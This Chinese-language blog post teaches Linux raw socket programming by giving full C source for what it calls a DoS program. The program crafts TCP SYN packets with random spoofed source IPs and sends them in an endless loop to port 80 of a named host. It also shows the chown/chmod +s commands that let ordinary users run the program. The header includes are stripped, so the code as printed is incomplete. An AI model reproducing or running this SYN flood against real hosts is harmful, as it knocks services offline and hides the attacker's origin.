Linux原始网络编程,Linux操作系统网络编程--原始套接字 (1)

最新推荐文章于 2023-10-07 22:47:51 发布
最新推荐文章于 2023-10-07 22:47:51 发布
阅读量49 收藏 1
点赞数
文章标签: Linux原始网络编程

原始套接字

我们在前面已经学习过了网络程序的两种套接字(SOCK_STREAM,SOCK_DRAGM).在这一章 里面我们一起来学习另外一种套接字--原始套接字(SOCK_RAW)。应用原始套接字,我们可以编写出由TCP和UDP套接字不能够实现的功能. 注意原始套接字只能够由有root权限的人创建。

原始套接字的创建

int sockfd(AF_INET,SOCK_RAW,protocol)

可以创建一个原始套接字.根据协议的类型不同我们可以创建不同类型的原始套接字 比如:IPPROTO_ICMP,IPPROTO_TCP,IPPROTO_UDP等等.详细的情况查看 下面我们以一个实例来说明原始套接字的创建和使用

一个原始套接字的实例

还记得DOS是什么意思吗?在这里我们就一起来编写一个实现DOS的小程序. 下面是程序的源代码

#include

#include

#include

#include

#include

#include

#include

#include

#include

#define DESTPORT 80 /* 要攻击的端口(WEB) */

#define LOCALPORT 8888

void send_tcp(int sockfd,struct sockaddr_in *addr);

unsigned short check_sum(unsigned short *addr,int len);

int main(int argc,char **argv)

{

int sockfd;

struct sockaddr_in addr;

struct hostent *host;

int on=1;

if(argc!=2)

{

fprintf(stderr,"Usage:%s hostname\n\a",argv[0]);

exit(1);

}

bzero(&addr,sizeof(struct sockaddr_in));

addr.sin_family=AF_INET;

addr.sin_port=htons(DESTPORT);

if(inet_aton(argv[1],&addr.sin_addr)==0)

{

host=gethostbyname(argv[1]);

if(host==NULL)

{

fprintf(stderr,"HostName Error:%s\n\a",hstrerror(h_errno));

exit(1);

}

addr.sin_addr=*(struct in_addr *)(host->h_addr_list[0]);

}

/**** 使用IPPROTO_TCP创建一个TCP的原始套接字 ****/

sockfd=socket(AF_INET,SOCK_RAW,IPPROTO_TCP);

if(sockfd<0)

{

fprintf(stderr,"Socket Error:%s\n\a",strerror(errno));

exit(1);

}

/******** 设置IP数据包格式,告诉系统内核模块IP数据包由我们自己来填写 ***/

setsockopt(sockfd,IPPROTO_IP,IP_HDRINCL,&on,sizeof(on));

/**** 没有办法,只用超级护用户才可以使用原始套接字 *********/

setuid(getpid());

/********* 发送炸弹了!!!! ****/

send_tcp(sockfd,&addr);

}

/******* 发送炸弹的实现 *********/

void send_tcp(int sockfd,struct sockaddr_in *addr)

{

char buffer[100]; /**** 用来放置我们的数据包 ****/

struct ip *ip;

struct tcphdr *tcp;

int head_len;

/******* 我们的数据包实际上没有任何内容,所以长度就是两个结构的长度 ***/

head_len=sizeof(struct ip)+sizeof(struct tcphdr);

bzero(buffer,100);

/******** 填充IP数据包的头部,还记得IP的头格式吗? ******/

ip=(struct ip *)buffer;

ip->ip_v=IPVERSION; /** 版本一般的是 4 **/

ip->ip_hl=sizeof(struct ip)>>2; /** IP数据包的头部长度 **/

ip->ip_tos=0; /** 服务类型 **/

ip->ip_len=htons(head_len); /** IP数据包的长度 **/

ip->ip_id=0; /** 让系统去填写吧 **/

ip->ip_off=0; /** 和上面一样,省点时间 **/

ip->ip_ttl=MAXTTL; /** 最长的时间 255 **/

ip->ip_p=IPPROTO_TCP; /** 我们要发的是 TCP包 **/

ip->ip_sum=0; /** 校验和让系统去做 **/

ip->ip_dst=addr->sin_addr; /** 我们攻击的对象 **/

/******* 开始填写TCP数据包 *****/

tcp=(struct tcphdr *)(buffer +sizeof(struct ip));

tcp->source=htons(LOCALPORT);

tcp->dest=addr->sin_port; /** 目的端口 **/

tcp->seq=random();

tcp->ack_seq=0;

tcp->doff=5;

tcp->syn=1; /** 我要建立连接 **/

tcp->check=0;

/** 好了,一切都准备好了.服务器,你准备好了没有?? ^_^ **/

while(1)

{

/** 你不知道我是从那里来的,慢慢的去等吧! **/

ip->ip_src.s_addr=random();

/** 什么都让系统做了,也没有多大的意思,还是让我们自己来校验头部吧 */

/** 下面这条可有可无 */

tcp->check=check_sum((unsigned short *)tcp,

sizeof(struct tcphdr));

sendto(sockfd,buffer,head_len,0,addr,sizeof(struct sockaddr_in));

}

}

/* 下面是首部校验和的算法,偷了别人的 */

unsigned short check_sum(unsigned short *addr,int len)

{

register int nleft=len;

register int sum=0;

register short *w=addr;

short answer=0;

while(nleft>1)

{

sum+=*w++;

nleft-=2;

}

if(nleft==1)

{

*(unsigned char *)(&answer)=*(unsigned char *)w;

sum+=answer;

}

sum=(sum>>16)+(sum&0xffff);

sum+=(sum>>16);

answer=~sum;

return(answer);

}

编译一下,拿localhost做一下实验,看看有什么结果.(千万不要试别人的啊). 为了让普通用户可以运行这个程序,我们应该将这个程序的所有者变为root,且 设置setuid位:

[root@hoyt /root]#chown root DOS

[root@hoyt /root]#chmod +s DOS

weixin_39686192
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Linux原始套接字实现分析
m0_74282605的博客
03-01 1153
图中TCP、UDP和ICMP协议的接收处理函数分别为tcp_v4_rcv()、udp_rcv()和icmp_rcv()。对于IP报文,在协议栈的ip_local_deliver_finish()函数中会匹配是否有注册的网络层原始套接字,若匹配上就通过skb_clone()克隆报文并交给相应的原始套接字来处理。对于IP报文,在协议栈的ip_local_deliver_finish()函数中会匹配是否有注册的网络层原始套接字,若匹配上就通过skb_clone()克隆报文并交给相应的原始套接字来处理。
Linux 系统应用编程——网络编程(基础篇)
知秋一叶
01-12 2060
一、网络体系结构
Linux操作系统网络编程--原始套接字
03-04
当我们创建了一个TCP套接字的时候,我们只是负责把我们要发送的内容(buffer)传递给了系统。系统在收到我们的数据后,回自动的调用相应的模块给数据加上TCP头部,然后加上IP头部,再发送出去。而现在是我们自己创建各个的头部,系统只是把它们发送出去。在上面的实例中,由于我们要修改我们的源IP地址,所以我们使用了setsockopt函数,如果我们只是修改TCP数据,那么IP数据一样也可以由系统来创建的。
Linux网络编程——原始套接字编程
热门推荐
秋叶原 && Mike || 麦克
03-27 5万+
原始套接字编程和之前的 UDP 编程差不多,无非就是创建一个套接字后,通过这个套接字接收数据或者发送数据。区别在于,原始套接字可以自行组装数据包(伪装本地 IP,本地 MAC),可以接收本机网卡上所有的数据帧(数据包)。另外,必须在管理员权限下才能使用原始套接字原始套接字的创建int socket ( int family, int type, int protocol );参数:family:...
Linux网络编程- 原始套接字(Raw Socket)
青衫客36的博客
10-07 3988
原始套接字(Raw Socket)提供了一种机制,允许应用程序直接访问底层传输协议,绕过操作系统提供的传输层接口。这种套接字通常用于实现新的协议或对现有协议进行低级别的操作。以下是对原始套接字的详细介绍:定义与用途:创建:特权:工作方式:用途与限制:注意事项:跨平台的差异:总的来说,原始套接字是一个非常强大的工具,但也需要谨慎使用。正确使用它需要对网络协议有深入的理解,而滥用它可能导致网络问题或被视为恶意活动。创建链路层的原始套接字允许我们直接与链路层设备(例如以太网适配器)交互,从而可以发送和接收链路层帧
Linux】套接字编程
Edward_Asia的博客
10-19 1581
创建socket的过程(socket()),本质是打开文件。(仅有系统相关的内容)2.bind(),struct sockaddr_in -> ip,port,本质是ip+port和文件信息进行关联listen(),本质是设置该socket文件的状态,允许别人来连接我accpet(),获取新链接到应用层,是以fd为代表的;所谓的连接,在OS层面,本质其实就是一个描述连接的结构体(文件)read/write,本质就是进行网络通信,对于用户来讲就相当于在进行正常的文件读写。
Linux网络编程原始套接字编程及实例分析.docx
11-29
Linux 网络编程 - 原始套接字编程及实例分析 一、原始套接字概述 原始套接字(SOCK_RAW)是一种特殊的套接字类型,它允许开发者在 Linux 系统中访问和控制网络协议栈的底层细节。原始套接字可以用来发送自定义的 ...
Linux下如何在数据链路层接收原始数据包
04-23
原始套接字允许我们绕过常规的协议处理流程,直接操作底层的数据包,包括数据链路层、网络层和传输层的头部信息。这样做可以获取更多的网络控制权,但也意味着我们需要自己处理这些报头,解析和构建网络数据包。 在...
Linux-Unix.rar_ Windows_Unix_linux_linux can_linux 网络_套接字
09-19
Socket分为多种类型,如流式套接字(TCP)、数据报套接字(UDP)和原始套接字,每种类型对应不同的传输特性。 流式套接字(TCP)提供面向连接的服务,保证数据的顺序和可靠性,适用于需要稳定传输的场景。创建TCP套...
linux_sock_raw.rar_RAW_linux sock raw_原始套接字
09-20
原始套接字是一种特殊类型的网络套接字,它允许用户绕过操作系统对网络数据的常规处理,直接与网络协议交互。这使得程序员可以构建自定义的网络协议,或者执行如嗅探数据包、发送特定类型的数据包等任务,这些任务在...
原始套接字编程
09-14
linux原始套接字编程,利用原始套接字实现arp请求和接收源代码
linux 原始套接字 编程
09-01
linux 原始套接字 编程
Linux网络编程原始套接字编程及实例分析
q623702748的专栏
07-29 4233
Linux网络编程原始套接字编程及实例分析 一、原始套接字能干什么? 二、原始套接字编程 三、原始套接字实例:MAC头部报文分析
Linux网络:套接字编程
yourfriendyo的博客
08-11 1098
数据实际是由进程产生和接收的,IP确定了主机,但还要进一步确定主机上的网络进程。。源端口号确定源主机上的网络进程,目的端口号确定目的主机上的网络进程。IP和端口就能标识互联网上的唯一一台机器上的唯一一个进程。可以把整个网络看作是一个大操作系统,所有的网络行为就可看作是这个系统内的进程间通信。进程具有独立性,进程间通信的前提是先让不同的进程看到同一份资源,而网络通信的临界资源就是网络。
Linux网络欺骗,Linux下网络攻击DDos的实现代码,tcp数据欺骗的实现
weixin_39534149的博客
05-06 138
/*注意:这次主要改了函数send_tcp里的代码,旧的代码在填充ip包时有问题。*/#include #include #include #include #include #include #include #include #include #define SRCPORT 1234#define DSTPORT 80struct prseuheader{unsigned long s_add...
Linux下的raw Socket(原始套接字)编程
聆听风雨的博客
06-29 2万+
前言 本文所述代码托管在https://github.com/Wuchenwcf/MyCode/blob/master/C%2B%2B/Linux/rawSocketTest.cpp 简介 最近项目需要用到rawSocket来进行自定义IP报文的源地址。 windows从winxp sp2开始便对raw socket进行了限制。 【1】只能发送UDP包 【2】只能发送正确的UDP包 ...
Linux】网络套接字编程
love_guanghui的博客
05-12 732
网络编程socket💡预备知识▶源IP地址与目的IP地址▶端口号与进程id▶源端口号与目的端口号▶UDP与TCP协议▶网络字节序💡套接字(socket)介绍▶概念▶分类▶工作流程💡socket编程▶socket编程接口▶sockaddr结构体🎄sockaddr结构体🎄sockaddr_in结构体🎄in_addr结构体💡socket编程应用▶基于udp协议的socket编程🎄服务端server_udp🎄客户端client_udp🎄地址转换函数🎄结果展示▶基于tcp协议的socket编程 💡预备知识 ▶源IP地
Linux raw socket
weixin_34198762的博客
12-31 609
我们平常所用到的网络编程都是在应用层收发数据,每个程序只能收到发给自己的数据,即每个程序只能收到来自该程序绑定的端口的数据。收到的数据往往只包括应用层数据。某些情况下我们需要执行更底层的操作,比如监听所有本机收发的数据、修改报头等。 通过原始套接字,我们可以抓取所有发送到本机的IP包(包括IP头和TCP/UDP/ICMP包头),也可以抓取所有本机收到的帧(包括数据链路层协议头)。普通的套接字无法...
【创新未发表】Matlab实现白冠鸡优化算法COOT-Kmean-Transformer-LSTM负荷预测算法研究.rar
最新发布
07-29
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
Linux套接字网络编程接口详解
"这篇文档主要讨论的是Linux环境下的高级套接字函数在网络编程中的应用,涵盖了套接字的基础知识,面向连接与无连接的套接字编程,以及更高级的套接字功能,包括服务器的I/O模型,原始套接字和数据链路层的套接字...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值